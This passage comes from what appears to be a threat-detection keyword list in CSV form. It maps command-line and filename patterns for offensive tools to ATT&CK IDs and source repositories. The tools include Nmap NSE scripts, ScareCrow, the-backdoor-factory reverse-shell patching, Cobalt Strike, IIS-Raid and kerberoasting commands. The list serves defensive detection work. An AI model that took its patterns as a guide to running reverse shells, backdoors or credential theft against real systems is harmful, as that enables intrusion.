-* http-stored-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-svn-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-svn-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-tenda-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* http-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-tplink-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-trace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-trane-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-unsafe-output-escaping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-useragent-tester.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-userdir-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vhosts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-virustotal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vlcstreamer-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vmware-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2006-3392.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2009-3960.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2010-0738.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2010-2861.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2011-3192.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2011-3368.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2012-1823.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2013-0156.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2013-6786.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2013-7091.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2126.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2127.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2128.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2129.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-3704.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-8877.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2015-1427.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2015-1635.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-1001000.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-5638.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-5689.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-8917.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vulners-regex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/vulnersCom/nmap-vulners,1,0,N/A,N/A,10,3002,526,2022-12-16T11:22:30Z,2017-12-19T21:21:28Z -* http-vuln-misfortune-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-wnr1000-creds.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-waf-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-waf-fingerprint.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-webdav-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-wordpress-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-wordpress-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-wordpress-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-xssed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -I *.bin * -Loader dll*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -i havex.profile *,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,0,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -* -i snmp-ips.txt -c community.txt*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,0,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -* iax2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iax2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* icap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* icebreaker.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* -Identity * -Set @{serviceprincipalname='*'}*,offensive_tool_keyword,AD exploitation cheat sheet,Targeted kerberoasting by setting SPN,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Identity * -XOR @{useraccountcontrol=4194304*,offensive_tool_keyword,AD exploitation cheat sheet,Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iec-identify.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iis_controller.py*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -* ike-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -im amass -ir *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im get-dns-records*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im github-get-repositories*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im google-get-linkedIn-employees*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im grep-through-commits*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im massdns*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* imaohw*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed whoami,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* imap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* imap-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation 